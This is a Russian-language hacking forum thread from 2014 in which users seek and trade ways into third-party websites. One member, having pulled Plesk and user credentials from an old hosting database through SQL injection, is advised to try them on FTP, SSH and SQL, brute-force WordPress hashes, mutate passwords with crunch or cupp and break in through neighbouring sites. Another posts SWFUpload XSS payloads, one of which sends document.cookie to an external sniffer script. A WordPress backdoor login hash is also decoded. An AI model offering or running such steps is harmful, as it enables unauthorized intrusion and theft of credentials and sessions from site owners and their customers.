ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

21.01.2014, 12:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от ysmat
ysmat said:
есть ли какие слабости у 1С-битрикс Управление сайтом
согласен на платный приват
Версия какая? Скриншот /bitrix/admin хотя бы.
|
|
|
|

22.01.2014, 18:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 329
Репутация:
0
|
|
Кто слышал про GomyeCMS и про её уязвимости? Нашел только одно, и та на китайском. при переводе получается ужасно.
|
|
|
|

30.01.2014, 15:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от unic0rn
unic0rn said:
Наткнулся на скулю в сайте одного хостинга, сам сайт - почти не дышит, админка в 403. Полагаю, что сайт банально переехал, так как по другому домену отзывается и вообще там все очень хорошо. Но БД старого сайта существует до сих пор и в ней есть таблица
Servers
. Колонки следующие:
ServerID, Active, DateAdded, ServerName, PleskPassword, PleskUserName, SuspendCommand, ControlPanelURL, SharedIPAddress, UnSuspendCommand, SuspendCommandResult, PrimaryDNSServerName, UnSuspendCommandResult, SecondaryDNSServerName, PrimaryDNSServerIPAddress, SecondaryDNSServerIPAddress, AlternativePrimaryDNSServerName, AlternativeSecondaryDNSServerName, AlternativePrimaryDNSServerIPAddress, AlternativeSecondaryDNSServerIPAddress
Также есть таблица
SystemUsers
с колонками:
SystemUserID, SystemUser, SysUserName, Active, ClientAccountLogin, SysPassword
Собственно, есть
url, username, password
для панели Plesk-а. Но под ними отказывается заходить, возможно поменяли все пароли.
Если у кого-то есть какие-либо соображения по этой теме - пожалуйста, не проходите мимо, спрашивайте/указывайте.
Вы все пары логин:пасс проверили? Попробуйте с ними достучаться на другие сервисы, ftp, ssh, sql, если открыты. Поищите что-нибудь вроде phpma где-нибудь рядом. В общем, ищите все, куда можно вбить логин:пасс и вбивайте. Также есть смысл залиться на сервак через соседние сайты и попробовать поднять локально через известные пароли.
|
|
|
|

30.01.2014, 17:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от unic0rn
unic0rn said:
Да, открыты ftp, ssh, но по ним тоже не подходят пароли. Заметил в БД огрызки WP, там 2 юзера, сейчас их пароли стоят на бруте.
В общем-то собрал небольшую пачку логинов/паролей (кроме тех, которые генерирует Plesk), сейчас эти добрутятся и буду ломиться везде. Дело в том, что этот сайт ссылался на ресурсы "основного" сайта, которые живы и сейчас. Дат нет, поэтому актуальность паролей сложно назвать. Еще и domain : email : psswd, которые лежат в таблице Domains, не подходят на этом самом живом сайте.
Спасибо за ответ, буду пробовать еще и через соседние ломиться.
Знакомая ситуация. Могу посоветовать немного рандомизировать пароли с помощью crunch или cupp. Даты можно косвенно выцепить из версий софта. Также иногда помогают exif-данные загруженных картинок или last-modified заголовки на некоторые страницы.
|
|
|
|

12.02.2014, 20:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 275
Репутация:
0
|
|
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpag e=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
|
|
|
|

13.02.2014, 23:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме: 1246854
Репутация:
622
|
|
Сообщение от student96
student96 said:
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpag e=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Password: 383256
MD5(383256): 371425ff7acc4360c86d097ebe9eb082
скорее всего бекдор
|
|
|

14.02.2014, 15:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 11396
Репутация:
0
|
|
я слышал что в базах некоторых интернет-шопов хранится информация о карточках,
которую продают, Что она вообще из себя представляет?
|
|
|
|

25.02.2014, 20:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 2217
Репутация:
0
|
|
Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.
Алерт отлично отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//
Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//
Даже банальная переадресация, также не отрабатывает:
http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//
Подскажите пожалуйста, в чем может быть причина?
|
|
|
|

26.02.2014, 21:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 11396
Репутация:
0
|
|
Вообщем такая проблема захожу на сайт в админку.Там есть кнопка администрирования и меня перекидывает ***.ru/admin.php и просто пустая страница, такая же фигня есле же пишу вместо сайта его ip/phpmyadmin просто пустая формаю, может какая защита
|
|
|
|

30.03.2014, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 259
Репутация:
0
|
|
Сообщение от student96
student96 said:
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpag e=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Это троян в теме. Тут вкратце есть об этом
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|